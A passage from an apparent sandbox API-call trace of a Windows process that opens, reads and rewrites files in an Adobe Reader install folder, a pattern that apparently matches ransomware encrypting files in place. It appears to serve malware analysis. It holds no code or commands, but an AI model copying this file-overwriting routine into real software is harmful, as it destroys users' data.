lpNumberOfBytesRead=0x311f2bc*=0xde, lpOverlapped=0x0) returned 1 [0085.145] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0085.145] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x666, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x311f2d0*=0x666, lpOverlapped=0x0) returned 1 [0085.145] CloseHandle (hObject=0x1ec) returned 1 [0085.145] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\trash.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\trash.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0085.146] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.146] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x489 [0085.146] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.146] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.146] ReleaseMutex (hMutex=0x168) returned 1 [0085.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="trash.gif", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0085.146] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="trash.gif", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trash.gif", lpUsedDefaultChar=0x0) returned 9 [0085.146] ReadFile (in: hFile=0x1ec, lpBuffer=0x2863a48, nNumberOfBytesToRead=0x489, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesRead=0x311f2bc*=0x489, lpOverlapped=0x0) returned 1 [0085.159] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0085.159] WriteFile (in: hFile=0x1ec, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa11, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0xa11, lpOverlapped=0x0) returned 1 [0085.160] CloseHandle (hObject=0x1ec) returned 1 [0085.160] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecs.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0085.161] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.161] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3f71 [0085.161] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.161] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.161] ReleaseMutex (hMutex=0x168) returned 1 [0085.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeCS.htm", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0085.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeCS.htm", cchWideChar=12, lpMultiByteStr=0x1f7344c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadMeCS.htm", lpUsedDefaultChar=0x0) returned 12 [0085.161] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.165] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2f71 [0085.165] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.174] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2f71 [0085.174] WriteFile (in: hFile=0x1ec, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.175] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0085.175] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.175] CloseHandle (hObject=0x1ec) returned 1 [0085.176] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeRUM.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmerum.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0085.176] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.176] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4318 [0085.176] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.176] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.177] ReleaseMutex (hMutex=0x168) returned 1 [0085.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeRUM.htm", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0085.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadMeRUM.htm", cchWideChar=13, lpMultiByteStr=0x1f7360c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadMeRUM.htm", lpUsedDefaultChar=0x0) returned 13 [0085.177] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.184] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3318 [0085.184] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0085.188] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3318 [0085.188] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0085.188] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0085.188] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0085.188] CloseHandle (hObject=0x1ec) returned 1 [0085.188] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CIDFont\\AdobeMyungjoStd-Medium.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cidfont\\adobemyungjostd-medium.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0085.189] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.189] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3e93f4 [0085.189] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0085.189] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0085.190] ReleaseMutex (hMutex=0x168) returned 1 [0085.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeMyungjoStd-Medium.otf", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0085.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeMyungjoStd-Medium.otf", cchWideChar=26, lpMultiByteStr=0x1f8fd5c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeMyungjoStd-Medium.otf", lpUsedDefaultChar=0x0) returned 26 [0085.190] ReadFile (in: hFile=0x1ec, lpBuffer=0x28a3918, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0085.298] ReadFile (in: hFile=0x1ec, lpBuffer=0x28a3918, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0085.520] ReadFile (in: hFile=0x1ec, lpBuffer=0x28a3918, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x28a3918*, lpNumberOfBytesRead=0x311f278*=0x2000, lpOverlapped=0x0) returned 1 [0085.520] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3e73f4 [0085.569] ReadFile (in: hFile=0x1ec, lpBuffer=0x2665868, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x311f278*=0x2000, lpOverlapped=0x0) returned 1 [0085.603] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3e73f4 [0085.623] WriteFile (in: hFile=0x1ec, lpBuffer=0x288ee18*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ee18*, lpNumberOfBytesWritten=0x311f28c*=0x2588, lpOverlapped=0x0) returned 1 [0085.623] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0085.624] WriteFile (in: hFile=0x1ec, lpBuffer=0x28ff7a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28ff7a8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0085.624] WriteFile (in: hFile=0x1ec, lpBuffer=0x28ff7a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28ff7a8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0085.625] WriteFile (in: hFile=0x1ec, lpBuffer=0x28ff7a8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28ff7a8*, lpNumberOfBytesWritten=0x311f28c*=0x2000, lpOverlapped=0x0) returned 1 [0085.625] CloseHandle (hObject=0x1ec) returned 1 [0085.625] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90msp-rksj-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.626] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-H", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-H", lpFilePart=0x311f690*="90msp-RKSJ-H") returned 0x43 [0085.626] GetLastError () returned 0x5 [0085.626] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0085.626] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.627] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.627] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0085.627] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.627] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.627] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\90msp-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\90msp-rksj-h")) returned 0x20 [0085.628] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-1" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.628] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-1", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-1", lpFilePart=0x311f690*="Adobe-CNS1-1") returned 0x43 [0085.628] GetLastError () returned 0x5 [0085.628] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0085.628] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.628] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.628] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0085.629] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.629] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.629] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-1" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-1")) returned 0x20 [0085.630] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Host" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-h-host"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.631] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Host", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Host", lpFilePart=0x311f690*="Adobe-CNS1-H-Host") returned 0x48 [0085.631] GetLastError () returned 0x5 [0085.631] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0085.631] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.631] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.631] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0085.631] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.631] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.632] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-CNS1-H-Host" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-cns1-h-host")) returned 0x20 [0085.632] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-5" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.632] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-5", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-5", lpFilePart=0x311f690*="Adobe-GB1-5") returned 0x42 [0085.632] GetLastError () returned 0x5 [0085.632] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0085.632] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.632] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.632] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0085.633] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.633] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.633] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-GB1-5" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-gb1-5")) returned 0x20 [0085.633] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-1" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.633] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-1", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-1", lpFilePart=0x311f690*="Adobe-Japan1-1") returned 0x45 [0085.633] GetLastError () returned 0x5 [0085.634] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0085.634] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.634] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.634] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0085.634] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.634] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.634] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-1" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-1")) returned 0x20 [0085.635] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-CID" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-h-cid"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.635] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-CID", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-CID", lpFilePart=0x311f690*="Adobe-Japan1-H-CID") returned 0x49 [0085.635] GetLastError () returned 0x5 [0085.635] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0085.635] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.635] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0085.635] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0085.635] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.636] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0085.636] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-CID" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-h-cid")) returned 0x20 [0085.636] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Host" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-h-host"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.637] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Host", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Host", lpFilePart=0x311f690*="Adobe-Korea1-H-Host") returned 0x4a [0085.637] GetLastError () returned 0x5 [0085.637] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑꧰Ƿ\x01") returned 0x13 [0085.637] LocalFree (hMem=0x69e2b0) returned 0x0 [0085.637] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 